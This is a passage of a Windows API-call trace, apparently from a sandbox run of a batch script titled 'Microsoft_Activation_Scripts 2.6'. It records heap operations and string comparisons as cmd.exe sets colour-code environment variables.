(in: _Dst=0x19a8f1ef790, _Src=0x19a8f1eeb50, _Size=0xc2c | out: _Dst=0x19a8f1ef790) returned 0x19a8f1ef790 [0177.160] FreeEnvironmentStringsA (penv="=") returned 1 [0177.160] GetProcessHeap () returned 0x19a8f1e0000 [0177.161] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edab0) returned 1 [0177.161] GetProcessHeap () returned 0x19a8f1e0000 [0177.161] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eda40) returned 1 [0177.162] GetProcessHeap () returned 0x19a8f1e0000 [0177.163] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fff00) returned 1 [0177.163] GetProcessHeap () returned 0x19a8f1e0000 [0177.163] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffec0) returned 1 [0177.164] GetProcessHeap () returned 0x19a8f1e0000 [0177.164] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f200c70 [0177.164] GetProcessHeap () returned 0x19a8f1e0000 [0177.164] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200c70, Size=0x30) returned 0x19a8f200c70 [0177.164] GetProcessHeap () returned 0x19a8f1e0000 [0177.164] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200c70) returned 0x30 [0177.164] GetProcessHeap () returned 0x19a8f1e0000 [0177.164] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f200cb0 [0177.164] GetProcessHeap () returned 0x19a8f1e0000 [0177.164] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200cb0, Size=0x58) returned 0x19a8f200cb0 [0177.164] GetProcessHeap () returned 0x19a8f1e0000 [0177.164] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200cb0) returned 0x58 [0177.164] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe1c0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.165] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.165] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.165] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.165] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.165] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.165] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.165] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.165] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.165] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.165] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.166] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.166] GetProcessHeap () returned 0x19a8f1e0000 [0177.166] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0b70 [0177.166] GetProcessHeap () returned 0x19a8f1e0000 [0177.166] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0b70, Size=0x22) returned 0x19a8f1eb860 [0177.166] GetProcessHeap () returned 0x19a8f1e0000 [0177.166] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x22 [0177.166] wcsncmp (_String1="\"esc", _String2="/", _MaxCount=0x4) returned -13 [0177.166] GetProcessHeap () returned 0x19a8f1e0000 [0177.166] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0d30 [0177.166] _wcsnicmp (_String1="\"e", _String2="/A", _MaxCount=0x2) returned -13 [0177.166] _wcsnicmp (_String1="\"e", _String2="/P", _MaxCount=0x2) returned -13 [0177.166] SetEnvironmentVariableW (lpName="esc", lpValue="\x1b") returned 1 [0177.166] GetProcessHeap () returned 0x19a8f1e0000 [0177.167] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef790) returned 1 [0177.167] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0177.167] GetProcessHeap () returned 0x19a8f1e0000 [0177.167] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbfa) returned 0x19a8f1eeb50 [0177.167] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xbfa | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0177.167] FreeEnvironmentStringsA (penv="=") returned 1 [0177.167] GetProcessHeap () returned 0x19a8f1e0000 [0177.168] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0d30) returned 1 [0177.168] GetProcessHeap () returned 0x19a8f1e0000 [0177.169] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0177.169] GetProcessHeap () returned 0x19a8f1e0000 [0177.169] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200cb0) returned 1 [0177.169] GetProcessHeap () returned 0x19a8f1e0000 [0177.170] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200c70) returned 1 [0177.170] GetProcessHeap () returned 0x19a8f1e0000 [0177.171] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea4b0) returned 1 [0177.171] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe380, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.172] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.172] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.172] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.172] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.172] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.172] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.172] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.172] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.172] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.172] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.172] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.172] GetProcessHeap () returned 0x19a8f1e0000 [0177.172] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1eaed0 [0177.173] GetProcessHeap () returned 0x19a8f1e0000 [0177.173] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaed0, Size=0x30) returned 0x19a8f1eaed0 [0177.173] GetProcessHeap () returned 0x19a8f1e0000 [0177.173] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0x30 [0177.173] wcsncmp (_String1="\"Red", _String2="/", _MaxCount=0x4) returned -13 [0177.173] GetProcessHeap () returned 0x19a8f1e0000 [0177.173] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f92c0 [0177.173] _wcsnicmp (_String1="\"R", _String2="/A", _MaxCount=0x2) returned -13 [0177.173] _wcsnicmp (_String1="\"R", _String2="/P", _MaxCount=0x2) returned -13 [0177.173] SetEnvironmentVariableW (lpName="Red", lpValue="\"41;97m\"") returned 1 [0177.173] GetProcessHeap () returned 0x19a8f1e0000 [0177.174] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0177.174] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0177.174] GetProcessHeap () returned 0x19a8f1e0000 [0177.174] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc14) returned 0x19a8f1eeb50 [0177.174] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xc14 | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0177.174] FreeEnvironmentStringsA (penv="=") returned 1 [0177.174] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe2f0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.174] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.174] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.174] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.174] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.174] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.174] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.174] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.175] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.175] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.175] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.175] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.175] GetProcessHeap () returned 0x19a8f1e0000 [0177.175] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x64) returned 0x19a8f1eaf10 [0177.175] GetProcessHeap () returned 0x19a8f1e0000 [0177.175] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaf10, Size=0x34) returned 0x19a8f1eaf10 [0177.175] GetProcessHeap () returned 0x19a8f1e0000 [0177.175] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaf10) returned 0x34 [0177.175] wcsncmp (_String1="\"Gra", _String2="/", _MaxCount=0x4) returned -13 [0177.175] GetProcessHeap () returned 0x19a8f1e0000 [0177.175] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x42) returned 0x19a8f1f9590 [0177.175] _wcsnicmp (_String1="\"G", _String2="/A", _MaxCount=0x2) returned -13 [0177.175] _wcsnicmp (_String1="\"G", _String2="/P", _MaxCount=0x2) returned -13 [0177.175] SetEnvironmentVariableW (lpName="Gray", lpValue="\"100;97m\"") returned 1 [0177.175] GetProcessHeap () returned 0x19a8f1e0000 [0177.176] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0177.176] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.176] GetProcessHeap () returned 0x19a8f1e0000 [0177.176] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc32) returned 0x19a8f1ef790 [0177.176] memcpy (in: _Dst=0x19a8f1ef790, _Src=0x19a8f1eeb50, _Size=0xc32 | out: _Dst=0x19a8f1ef790) returned 0x19a8f1ef790 [0177.176] FreeEnvironmentStringsA (penv="=") returned 1 [0177.176] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe260, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.177] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.177] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.177] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.177] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.177] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.177] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.177] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.177] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.177] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.177] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.177] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.177] GetProcessHeap () returned 0x19a8f1e0000 [0177.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f8ac0 [0177.177] GetProcessHeap () returned 0x19a8f1e0000 [0177.177] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f8ac0, Size=0x2e) returned 0x19a8f1e08b0 [0177.178] GetProcessHeap () returned 0x19a8f1e0000 [0177.178] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e08b0) returned 0x2e [0177.178] wcsncmp (_String1="\"Bla", _String2="/", _MaxCount=0x4) returned -13 [0177.178] GetProcessHeap () returned 0x19a8f1e0000 [0177.178] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f8ff0 [0177.178] _wcsnicmp (_String1="\"B", _String2="/A", _MaxCount=0x2) returned -13 [0177.178] _wcsnicmp (_String1="\"B", _String2="/P", _MaxCount=0x2) returned -13 [0177.178] SetEnvironmentVariableW (lpName="Black", lpValue="\"30m\"") returned 1 [0177.178] GetProcessHeap () returned 0x19a8f1e0000 [0177.178] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef790) returned 1 [0177.179] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0177.179] GetProcessHeap () returned 0x19a8f1e0000 [0177.179] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc4a) returned 0x19a8f1eeb50 [0177.179] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xc4a | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0177.179] FreeEnvironmentStringsA (penv="=") returned 1 [0177.179] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe1d0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.179] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.179] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.180] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.180] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.180] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.180] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.180] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.180] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.180] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.180] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.180] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.180] GetProcessHeap () returned 0x19a8f1e0000 [0177.180] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1eaf60 [0177.180] GetProcessHeap () returned 0x19a8f1e0000 [0177.180] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaf60, Size=0x34) returned 0x19a8f1eaf60 [0177.180] GetProcessHeap () returned 0x19a8f1e0000 [0177.180] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaf60) returned 0x34 [0177.180] wcsncmp (_String1="\"Gre", _String2="/", _MaxCount=0x4) returned -13 [0177.180] GetProcessHeap () returned 0x19a8f1e0000 [0177.180] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9220 [0177.180] _wcsnicmp (_String1="\"G", _String2="/A", _MaxCount=0x2) returned -13 [0177.180] _wcsnicmp (_String1="\"G", _String2="/P", _MaxCount=0x2) returned -13 [0177.180] SetEnvironmentVariableW (lpName="Green", lpValue="\"42;97m\"") returned 1 [0177.180] GetProcessHeap () returned 0x19a8f1e0000 [0177.181] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0177.181] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.181] GetProcessHeap () returned 0x19a8f1e0000 [0177.181] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc68) returned 0x19a8f1ef7c0 [0177.181] memcpy (in: _Dst=0x19a8f1ef7c0, _Src=0x19a8f1eeb50, _Size=0xc68 | out: _Dst=0x19a8f1ef7c0) returned 0x19a8f1ef7c0 [0177.181] FreeEnvironmentStringsA (penv="=") returned 1 [0177.181] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe140, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.184] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.184] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.184] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.184] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.184] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.184] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.184] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.184] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.184] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.184] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.184] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.184] GetProcessHeap () returned 0x19a8f1e0000 [0177.184] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1eda90 [0177.185] GetProcessHeap () returned 0x19a8f1e0000 [0177.185] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eda90, Size=0x32) returned 0x19a8f1eda90 [0177.185] GetProcessHeap () returned 0x19a8f1e0000 [0177.185] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eda90) returned 0x32 [0177.185] wcsncmp (_String1="\"Blu", _String2="/", _MaxCount=0x4) returned -13 [0177.185] GetProcessHeap () returned 0x19a8f1e0000 [0177.185] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f95e0 [0177.185] _wcsnicmp (_String1="\"B", _String2="/A", _MaxCount=0x2) returned -13 [0177.185] _wcsnicmp (_String1="\"B", _String2="/P", _MaxCount=0x2) returned -13 [0177.185] SetEnvironmentVariableW (lpName="Blue", lpValue="\"44;97m\"") returned 1 [0177.185] GetProcessHeap () returned 0x19a8f1e0000 [0177.186] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef7c0) returned 1 [0177.186] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.186] GetProcessHeap () returned 0x19a8f1e0000 [0177.186] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc84) returned 0x19a8f1ef7e0 [0177.186] memcpy (in: _Dst=0x19a8f1ef7e0, _Src=0x19a8f1eeb50, _Size=0xc84 | out: _Dst=0x19a8f1ef7e0) returned 0x19a8f1ef7e0 [0177.186] FreeEnvironmentStringsA (penv="=") returned 1 [0177.186] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe0b0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.187] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.187] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.187] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.187] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.187] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.187] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.187] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.187] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.187] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.187] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.187] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.187] GetProcessHeap () returned 0x19a8f1e0000 [0177.187] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1f0470 [0177.187] GetProcessHeap () returned 0x19a8f1e0000 [0177.187] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0470, Size=0x36) returned 0x19a8f1f0470 [0177.187] GetProcessHeap () returned 0x19a8f1e0000 [0177.187] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0470) returned 0x36 [0177.188] wcsncmp (_String1="\"Yel", _String2="/", _MaxCount=0x4) returned -13 [0177.188] GetProcessHeap () returned 0x19a8f1e0000 [0177.188] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9090 [0177.188] _wcsnicmp (_String1="\"Y", _String2="/A", _MaxCount=0x2) returned -13 [0177.188] _wcsnicmp (_String1="\"Y", _String2="/P", _MaxCount=0x2) returned -13 [0177.188] SetEnvironmentVariableW (lpName="Yellow", lpValue="\"43;97m\"") returned 1 [0177.188] GetProcessHeap () returned 0x19a8f1e0000 [0177.188] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef7e0) returned 1 [0177.188] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.188] GetProcessHeap () returned 0x19a8f1e0000 [0177.188] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xca4) returned 0x19a8f201800 [0177.188] memcpy (in: _Dst=0x19a8f201800, _Src=0x19a8f1eeb50, _Size=0xca4 | out: _Dst=0x19a8f201800) returned 0x19a8f201800 [0177.189] FreeEnvironmentStringsA (penv="=") returned 1 [0177.189] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe020, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.189] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.189] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.189] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.189] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.190] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.190] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.190] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.190] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.190] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.190] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.190] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.190] GetProcessHeap () returned 0x19a8f1e0000 [0177.190] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1f04c0 [0177.190] GetProcessHeap () returned 0x19a8f1e0000 [0177.190] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f04c0, Size=0x38) returned 0x19a8f1f04c0 [0177.190] GetProcessHeap () returned 0x19a8f1e0000 [0177.190] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f04c0) returned 0x38 [0177.190] wcsncmp (_String1="\"Mag", _String2="/", _MaxCount=0x4) returned -13 [0177.190] GetProcessHeap () returned 0x19a8f1e0000 [0177.190] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f94a0 [0177.190] _wcsnicmp (_String1="\"M", _String2="/A", _MaxCount=0x2) returned -13 [0177.190] _wcsnicmp (_String1="\"M", _String2="/P", _MaxCount=0x2) returned -13 [0177.190] SetEnvironmentVariableW (lpName="Magenta", lpValue="\"45;97m\"") returned 1 [0177.190] GetProcessHeap () returned 0x19a8f1e0000 [0177.191] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201800) returned 1 [0177.191] GetEnvironmentStringsW () returned 0x19a8f1ffec0* [0177.191] GetProcessHeap () returned 0x19a8f1e0000 [0177.191] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xcc6) returned 0x19a8f200b90 [0177.191] memcpy (in: _Dst=0x19a8f200b90, _Src=0x19a8f1ffec0, _Size=0xcc6 | out: _Dst=0x19a8f200b90) returned 0x19a8f200b90 [0177.191] FreeEnvironmentStringsA (penv="=") returned 1 [0177.191] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efdf90, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.192] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.192] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.195] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.195] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.195] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.195] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.195] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.195] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.195] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.195] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.195] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.195] GetProcessHeap () returned 0x19a8f1e0000 [0177.195] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1f0510 [0177.195] GetProcessHeap () returned 0x19a8f1e0000 [0177.195] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0510, Size=0x32) returned 0x19a8f1f0510 [0177.195] GetProcessHeap () returned 0x19a8f1e0000 [0177.195] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0510) returned 0x32 [0177.195] wcsncmp (_String1="\"_Re", _String2="/", _MaxCount=0x4) returned -13 [0177.195] GetProcessHeap () returned 0x19a8f1e0000 [0177.195] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f93b0 [0177.195] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.196] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.196] SetEnvironmentVariableW (lpName="_Red", lpValue="\"40;91m\"") returned 1 [0177.196] GetProcessHeap () returned 0x19a8f1e0000 [0177.196] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200b90) returned 1 [0177.196] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0177.196] GetProcessHeap () returned 0x19a8f1e0000 [0177.196] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xce2) returned 0x19a8f1ffec0 [0177.196] memcpy (in: _Dst=0x19a8f1ffec0, _Src=0x19a8f1eeb50, _Size=0xce2 | out: _Dst=0x19a8f1ffec0) returned 0x19a8f1ffec0 [0177.196] FreeEnvironmentStringsA (penv="=") returned 1 [0177.196] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efdf00, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.197] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.197] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.197] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.197] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.197] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.197] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.197] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.197] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.197] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.197] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.198] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.198] GetProcessHeap () returned 0x19a8f1e0000 [0177.198] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1f0560 [0177.198] GetProcessHeap () returned 0x19a8f1e0000 [0177.198] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0560, Size=0x36) returned 0x19a8f1f0560 [0177.198] GetProcessHeap () returned 0x19a8f1e0000 [0177.198] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0560) returned 0x36 [0177.198] wcsncmp (_String1="\"_Gr", _String2="/", _MaxCount=0x4) returned -13 [0177.198] GetProcessHeap () returned 0x19a8f1e0000 [0177.198] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f94f0 [0177.198] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.198] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.198] SetEnvironmentVariableW (lpName="_Green", lpValue="\"40;92m\"") returned 1 [0177.198] GetProcessHeap () returned 0x19a8f1e0000 [0177.199] RtlFreeHeap 